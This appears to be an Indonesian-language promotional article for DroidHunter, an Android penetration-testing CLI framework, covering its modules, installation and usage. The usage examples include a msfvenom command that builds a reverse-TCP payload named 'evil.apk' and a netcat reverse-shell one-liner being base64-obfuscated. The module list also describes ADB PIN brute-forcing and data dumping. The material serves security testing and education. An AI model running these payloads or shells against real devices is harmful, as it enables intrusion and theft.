Di dunia perangkat mobile yang semakin kompleks, keamanan aplikasi Android menjadi perhatian utama. Untuk para ethical hacker dan penetration tester profesional, memiliki alat yang tepat sangat penting. DroidHunter hadir sebagai solusi komprehensif, sebuah framework penilaian keamanan Android berbasis Command Line Interface (CLI) yang mengintegrasikan berbagai permukaan serangan dalam satu alat. Dikembangkan oleh HexSec Team / HexSec Community, DroidHunter dirancang khusus untuk penilaian keamanan Android yang sah, keperluan edukasi, dan alur kerja pengujian penetrasi profesional.
Mengapa DroidHunter?
DroidHunter menawarkan antarmuka terminal yang estetik, khas para hacker, namun tetap mudah digunakan. Alat ini menyatukan berbagai fungsi yang biasanya tersebar di beberapa tool berbeda. Mulai dari mengelola perangkat Android hingga menganalisis APK, memindai jaringan, mencari kerentanan, dan bahkan menghasilkan payload berbahaya untuk tujuan pengujian. Semua fitur ini disatukan agar pekerjaan Anda menjadi lebih efisien dan terorganisir.
Jika DroidHunter membantu Anda dalam penelitian keamanan Android, edukasi, atau alur kerja Anda, Anda bisa mendukung proyek ini melalui donasi kecil. Anda dapat mengirimkan USDT melalui jaringan Ethereum (ERC-20) ke alamat 0x3E79B73e3ce33c6B860425DCB40c6D2f4F2aC508. Penting untuk diingat agar hanya mengirim USDT pada jaringan Ethereum (ERC-20), karena pengiriman dana di jaringan lain dapat mengakibatkan kerugian permanen.
Fitur Utama DroidHunter
DroidHunter hadir dengan serangkaian modul kuat yang siap mendukung aktivitas pengujian Anda. Berikut ringkasan modul-modul yang tersedia:
| Modul | Deskripsi |
|---|---|
| Device Manager | Mendata perangkat, informasi perangkat secara detail, menghubungkan ADB WiFi secara manual atau otomatis, mengambil screenshot, menangkap logcat, serta melakukan transfer file antara perangkat dan mesin Anda. |
| APK Analyzer | Melakukan dekomposisi statis untuk mengidentifikasi izin, rahasia tersemat seperti kunci API atau kredensial, komponen yang diekspor, pemetaan CVE, hash file, deteksi obfuscation, native library, serta URL dan IP yang tersemat. Modul ini juga menerapkan heuristik untuk mendeteksi potensi kerentanan, seperti flag debuggable atau konfigurasi keamanan jaringan yang lemah. |
| Network Scanner | Menawarkan pemindaian port cepat, mendapatkan informasi WiFi, penemuan subnet, dan menyediakan panduan untuk menyiapkan serangan Man-in-the-Middle (MitM). |
| Vulnerability Scanner | Memetakan lebih dari 30 CVE yang relevan dengan level SDK Android (misalnya, Stagefright, BlueBorne, StrandHogg, BlueFrag), deteksi root (su binary, Magisk, SuperSU), deteksi Frida, identifikasi penyimpanan data yang tidak aman, pemeriksaan WebView, dan deteksi pembajakan tugas ala StrandHogg. |
| Exploit Engine | Mampu meluncurkan aktivitas yang diekspor tanpa izin, memicu broadcast intent berbahaya, membuang data dari content provider, melakukan fuzzing pada 20+ jalur deep link untuk mencari endpoint yang tidak terlindungi, menyediakan panduan injeksi Frida/objection, menjatuhkan reverse shell via ADB, mengekstrak database SQLite, dan bahkan melakukan brute force PIN untuk bypass kunci perangkat melalui keyevents ADB. |
| Payload Generator | Membuat payload APK Meterpreter reverse TCP atau HTTPS menggunakan msfvenom, enam one-liner reverse shell (nc, bash, python3, perl, socat), skrip eksploitasi ADB, serta melakukan obfuscation payload dengan Base64 atau hex. |
| Report Generator | Menghasilkan laporan dalam format HTML dengan tema gelap glassmorphism, dilengkapi lencana tingkat keparahan, kartu temuan dengan tautan CVE, dan saran remediasi. Selain itu, DroidHunter juga menyediakan laporan JSON terstruktur yang mudah dibaca mesin, serta ringkasan tabel CLI yang disortir berdasarkan tingkat keparahan. |
| Remote Control | Memungkinkan Anda membuka layar jarak jauh perangkat Android melalui scrcpy dari menu interaktif DroidHunter. |
Instalasi DroidHunter
Memulai DroidHunter tidaklah sulit. Ikuti langkah-langkah di bawah ini:
bash# 1. Clone atau navigasi ke direktori alat # cd /path/to/droidhunter git clone https://github.com/hexsecteam/DroidHunter.git # 2. Buat lingkungan virtual python -m venv venv source venv/bin/activate # 3. Instal dependensi Python pip3 install -r requirements.txt # 4. (Opsional) Instal ADB # Untuk Debian/Ubuntu sudo apt install adb # Untuk Arch # sudo pacman -S android-tools # 5. (Opsional untuk Remote Control) Instal scrcpy sudo apt install scrcpy # 6. (Opsional untuk pembuatan payload) Instal Metasploit # Kunjungi https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html untuk panduan instalasi
Cara Penggunaan DroidHunter
DroidHunter mendukung dua mode penggunaan: mode interaktif untuk kemudahan navigasi, dan mode CLI untuk skrip otomatisasi.
Mode Interaktif (Direkomendasikan)
Mode interaktif adalah cara paling mudah untuk menggunakan DroidHunter. Anda bisa mengaktifkannya dengan perintah berikut:
bashpython3 droidhunter.py # atau python3 droidhunter.py --interactive
Dari menu interaktif, Anda bisa mengakses fitur Remote Control untuk mencerminkan layar Android menggunakan scrcpy. DroidHunter juga mendukung koneksi ADB WiFi, baik secara manual maupun otomatis. Koneksi ADB WiFi otomatis memerlukan perangkat terhubung USB terlebih dahulu, USB Debugging aktif, dan kedua perangkat berada di jaringan WiFi yang sama.
Mode CLI
Untuk penggunaan yang lebih spesifik atau dalam skrip otomatisasi, Anda bisa menggunakan mode CLI. Berikut beberapa contoh perintah:
-
Melihat perangkat yang terhubung:
bashpython3 droidhunter.py --devices -
Menganalisis APK dan membuat laporan HTML:
bashpython3 droidhunter.py --apk target.apk --report html --target-name "com.example.app" -
Memindai port perangkat:
bashpython3 droidhunter.py --device ABC123 --port-scan -
Memindai kerentanan penuh pada perangkat dan aplikasi:
bashpython3 droidhunter.py --device ABC123 --vuln-scan --pkg com.example.app -
Mengecek CVE berdasarkan versi Android:
bashpython3 droidhunter.py --device ABC123 --cve-check -
Mengecek apakah perangkat di-root:
bashpython3 droidhunter.py --device ABC123 --root-check -
Mengambil screenshot perangkat:
bashpython3 droidhunter.py --device ABC123 --screenshot -
Meluncurkan aktivitas yang diekspor:
bashpython3 droidhunter.py --device ABC123 --exploit activity \ --pkg com.example.app --activity com.example.app.DebugActivity -
Melakukan fuzzing deep link:
bashpython3 droidhunter.py --device ABC123 --exploit deep-link \ --pkg com.example.app --scheme myapp -
Membuat payload APK msfvenom:
bashpython3 droidhunter.py --payload reverse_tcp \ --lhost 192.168.1.100 --lport 4444 --payload-out evil.apk -
Mengobfusikasi perintah:
bashpython3 droidhunter.py --payload obfuscate \ --raw-payload "busybox nc 10.0.0.1 4444 -e /system/bin/sh" \ --obfuscate-method base64
Output Laporan
DroidHunter tidak hanya membantu menemukan kerentanan, tetapi juga menyajikan temuan dalam format yang mudah dicerna. Anda bisa mendapatkan:
- Laporan HTML, dengan tema gelap glassmorphism, lencana tingkat keparahan, kartu temuan yang dilengkapi tautan CVE, dan saran remediasi.
- Laporan JSON, output terstruktur yang mudah diolah oleh mesin.
- Tabel CLI, ringkasan cepat langsung di terminal yang disortir berdasarkan tingkat keparahan, dari CRITICAL hingga LOW.
Persyaratan Sistem
Untuk menjalankan DroidHunter dengan lancar, pastikan sistem Anda memenuhi persyaratan berikut:
| Persyaratan | Tujuan |
|---|---|
| Python 3.8+ | Lingkungan runtime utama |
rich | Untuk antarmuka terminal yang lebih baik |
requests | Untuk pemeriksaan HTTP |
| ADB (opsional) | Interaksi dan kontrol perangkat Android |
scrcpy (opsional) | Pencerminan layar Android jarak jauh |
| Metasploit (opsional) | Untuk pembuatan payload APK |
| Frida (opsional) | Untuk instrumentasi runtime aplikasi |
mitmproxy (opsional) | Untuk intersepsi lalu lintas jaringan |
Penting: Disclaimer Hukum
DroidHunter dibuat secara eksklusif untuk penilaian keamanan yang sah, kompetisi CTF (Capture The Flag), dan penelitian edukasi. Penggunaan alat ini secara tidak sah terhadap sistem yang tidak Anda miliki atau tidak memiliki izin tertulis eksplisit untuk diuji adalah ilegal. HexSecTeam selaku pengembang dan para kontributor tidak bertanggung jawab atas penyalahgunaan atau kerusakan apa pun yang disebabkan oleh alat ini. Gunakan DroidHunter dengan bijak dan bertanggung jawab.
Referensi
https://github.com/hexsecteam/DroidHunter
